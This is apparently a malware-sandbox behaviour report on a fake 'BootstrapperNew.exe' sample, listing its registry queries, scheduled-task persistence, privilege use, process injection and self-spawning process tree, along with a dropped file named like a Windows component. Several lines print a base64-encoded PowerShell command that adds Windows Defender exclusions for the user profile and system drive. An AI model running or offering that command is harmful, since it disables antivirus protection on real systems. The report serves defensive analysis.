Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={4716907A-E266-4403-9FD6-9DC7734AE833}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1741281368"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 06 Mar 2025 17:16:09 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5784	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2564	powershell.exe
1532	powershell.exe
1492	powershell.exe
3748	powershell.exe
3748	powershell.exe
2564	powershell.exe
2564	powershell.exe
3712	powershell.exe
3712	powershell.exe
1532	powershell.exe
1532	powershell.exe
1492	powershell.exe
1492	powershell.exe
448	powershell.exe
448	powershell.exe
3748	powershell.exe
1088	powershell.exe
1088	powershell.exe
1088	powershell.exe
3712	powershell.exe
1612	powershell.exe
1612	powershell.exe
1628	powershell.exe
1628	powershell.exe
448	powershell.exe
448	powershell.exe
4896	powershell.exe
4896	powershell.exe
1612	powershell.exe
1628	powershell.exe
4760	powershell.exe
4760	powershell.exe
2376	powershell.exe
2376	powershell.exe
4896	powershell.exe
2568	powershell.exe
2568	powershell.exe
4760	powershell.exe
4164	powershell.exe
4164	powershell.exe
2376	powershell.exe
4596	powershell.exe
4596	powershell.exe
5296	powershell.exe
5296	powershell.exe
2568	powershell.exe
5548	powershell.exe
5548	powershell.exe
5896	powershell.exe
5896	powershell.exe
4164	powershell.exe
4596	powershell.exe
6104	powershell.exe
6104	powershell.exe
5296	powershell.exe
5296	powershell.exe
2000	powershell.exe
2000	powershell.exe
5556	MasonRootkit.exe
5556	MasonRootkit.exe
5756	dllhost.exe
5756	dllhost.exe
5548	powershell.exe
5628	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3400	Explorer.EXE
6256	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3332	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	1616	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	1724	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	4420	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	3748	powershell.exe
Token: SeDebugPrivilege	1504	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	3100	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	3712	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	1004	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	3620	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	2820	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	1316	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	4580	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	2292	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeDebugPrivilege	3720	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2584	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	5316	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	5580	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	5296	powershell.exe
Token: SeDebugPrivilege	5932	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	5548	powershell.exe
Token: SeDebugPrivilege	6136	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	5896	powershell.exe
Token: SeDebugPrivilege	3488	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	6104	powershell.exe
Token: SeDebugPrivilege	6020	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	5556	MasonRootkit.exe
Token: SeDebugPrivilege	5556	MasonRootkit.exe
Token: SeDebugPrivilege	5756	dllhost.exe
Token: SeDebugPrivilege	5844	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	5628	powershell.exe
Token: SeDebugPrivilege	5372	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	5732	powershell.exe
Token: SeDebugPrivilege	5528	powershell.exe
Token: SeDebugPrivilege	6080	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	5476	powershell.exe
Token: SeDebugPrivilege	6396	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	6300	powershell.exe
Token: SeDebugPrivilege	6692	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	6968	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	6660	powershell.exe
Token: SeDebugPrivilege	6924	powershell.exe
Token: SeDebugPrivilege	6152	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	5956	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	6844	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	5932	powershell.exe
Token: SeDebugPrivilege	6780	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	6384	powershell.exe
Token: SeDebugPrivilege	7004	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe
6256	taskmgr.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
7240	Process not Found
5604	Process not Found
4956	Process not Found
5844	Process not Found
7792	Process not Found
5812	Process not Found
5792	Process not Found
5148	Process not Found
6940	Process not Found
2488	Process not Found
7300	Process not Found
4996	Process not Found
5776	Process not Found
6264	Process not Found
8052	Process not Found
5720	Process not Found
7624	Process not Found
7596	Process not Found
6008	Process not Found
5612	Process not Found
3780	Process not Found
3876	Process not Found
4232	Process not Found
2984	Process not Found
7680	Process not Found
4288	Process not Found
6704	Process not Found
5180	Process not Found
3992	Process not Found
6172	Process not Found
7144	Process not Found
5016	Process not Found
7716	Process not Found
7936	Process not Found
1088	Process not Found
6824	Process not Found
8048	Process not Found
2228	Process not Found
6432	Process not Found
4404	Process not Found
5136	Process not Found
7340	Process not Found
6348	Process not Found
6472	Process not Found
3160	Process not Found
6344	Process not Found
7308	Process not Found
3780	Conhost.exe
6508	Process not Found
2572	Process not Found
7968	Process not Found
7452	Process not Found
2756	Process not Found
7380	Process not Found
512	Process not Found
5944	Process not Found
6840	Process not Found
5356	Process not Found
6864	Process not Found
2932	Process not Found
8124	Conhost.exe
6880	Process not Found
5476	Process not Found
3868	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4640 wrote to memory of 1532	4640	BootstrapperNew.exe	87
PID 4640 wrote to memory of 1532	4640	BootstrapperNew.exe	87
PID 4640 wrote to memory of 1532	4640	BootstrapperNew.exe	87
PID 4640 wrote to memory of 4176	4640	BootstrapperNew.exe	89
PID 4640 wrote to memory of 4176	4640	BootstrapperNew.exe	89
PID 4640 wrote to memory of 4176	4640	BootstrapperNew.exe	89
PID 4640 wrote to memory of 3332	4640	BootstrapperNew.exe	90
PID 4640 wrote to memory of 3332	4640	BootstrapperNew.exe	90
PID 4176 wrote to memory of 2564	4176	BootstrapperNew.exe	91
PID 4176 wrote to memory of 2564	4176	BootstrapperNew.exe	91
PID 4176 wrote to memory of 2564	4176	BootstrapperNew.exe	91
PID 4176 wrote to memory of 1100	4176	BootstrapperNew.exe	93
PID 4176 wrote to memory of 1100	4176	BootstrapperNew.exe	93
PID 4176 wrote to memory of 1100	4176	BootstrapperNew.exe	93
PID 4176 wrote to memory of 1616	4176	BootstrapperNew.exe	94
PID 4176 wrote to memory of 1616	4176	BootstrapperNew.exe	94
PID 1100 wrote to memory of 1492	1100	BootstrapperNew.exe	95
PID 1100 wrote to memory of 1492	1100	BootstrapperNew.exe	95
PID 1100 wrote to memory of 1492	1100	BootstrapperNew.exe	95
PID 1100 wrote to memory of 2228	1100	BootstrapperNew.exe	96
PID 1100 wrote to memory of 2228	1100	BootstrapperNew.exe	96
PID 1100 wrote to memory of 2228	1100	BootstrapperNew.exe	96
PID 1100 wrote to memory of 1724	1100	BootstrapperNew.exe	98
PID 1100 wrote to memory of 1724	1100	BootstrapperNew.exe	98
PID 2228 wrote to memory of 3748	2228	BootstrapperNew.exe	99
PID 2228 wrote to memory of 3748	2228	BootstrapperNew.exe	99
PID 2228 wrote to memory of 3748	2228	BootstrapperNew.exe	99
PID 2228 wrote to memory of 4676	2228	BootstrapperNew.exe	101
PID 2228 wrote to memory of 4676	2228	BootstrapperNew.exe	101
PID 2228 wrote to memory of 4676	2228	BootstrapperNew.exe	101
PID 2228 wrote to memory of 4420	2228	BootstrapperNew.exe	102
PID 2228 wrote to memory of 4420	2228	BootstrapperNew.exe	102
PID 4676 wrote to memory of 3712	4676	BootstrapperNew.exe	103
PID 4676 wrote to memory of 3712	4676	BootstrapperNew.exe	103
PID 4676 wrote to memory of 3712	4676	BootstrapperNew.exe	103
PID 4676 wrote to memory of 916	4676	BootstrapperNew.exe	104
PID 4676 wrote to memory of 916	4676	BootstrapperNew.exe	104
PID 4676 wrote to memory of 916	4676	BootstrapperNew.exe	104
PID 4676 wrote to memory of 1504	4676	BootstrapperNew.exe	106
PID 4676 wrote to memory of 1504	4676	BootstrapperNew.exe	106
PID 916 wrote to memory of 448	916	BootstrapperNew.exe	107
PID 916 wrote to memory of 448	916	BootstrapperNew.exe	107
PID 916 wrote to memory of 448	916	BootstrapperNew.exe	107
PID 916 wrote to memory of 2336	916	BootstrapperNew.exe	109
PID 916 wrote to memory of 2336	916	BootstrapperNew.exe	109
PID 916 wrote to memory of 2336	916	BootstrapperNew.exe	109
PID 916 wrote to memory of 3100	916	BootstrapperNew.exe	110
PID 916 wrote to memory of 3100	916	BootstrapperNew.exe	110
PID 3332 wrote to memory of 1088	3332	Credential Guard & VBS Key Isolation.exe	111
PID 3332 wrote to memory of 1088	3332	Credential Guard & VBS Key Isolation.exe	111
PID 2336 wrote to memory of 1612	2336	BootstrapperNew.exe	113
PID 2336 wrote to memory of 1612	2336	BootstrapperNew.exe	113
PID 2336 wrote to memory of 1612	2336	BootstrapperNew.exe	113
PID 2336 wrote to memory of 1900	2336	BootstrapperNew.exe	114
PID 2336 wrote to memory of 1900	2336	BootstrapperNew.exe	114
PID 2336 wrote to memory of 1900	2336	BootstrapperNew.exe	114
PID 2336 wrote to memory of 1004	2336	BootstrapperNew.exe	115
PID 2336 wrote to memory of 1004	2336	BootstrapperNew.exe	115
PID 1900 wrote to memory of 1628	1900	BootstrapperNew.exe	118
PID 1900 wrote to memory of 1628	1900	BootstrapperNew.exe	118
PID 1900 wrote to memory of 1628	1900	BootstrapperNew.exe	118
PID 1900 wrote to memory of 540	1900	BootstrapperNew.exe	303
PID 1900 wrote to memory of 540	1900	BootstrapperNew.exe	303
PID 1900 wrote to memory of 540	1900	BootstrapperNew.exe	303

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:340
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{389af971-b155-45fc-8f97-dc295deb8f41}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5756

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1176
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2708
- C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe
  "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"
  2⤵
  - Executes dropped EXE
  PID:5912
- C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe
  "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"
  2⤵
  PID:7336
- C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe
  "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"
  2⤵
  PID:4256
- C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe
  "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"
  2⤵
  PID:2068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1436
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1844

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2668

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2776

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2664

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3400
- C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4640
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1532
- - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4176
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2564
  - - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1100
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1492
    - - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2228
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3748
      - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
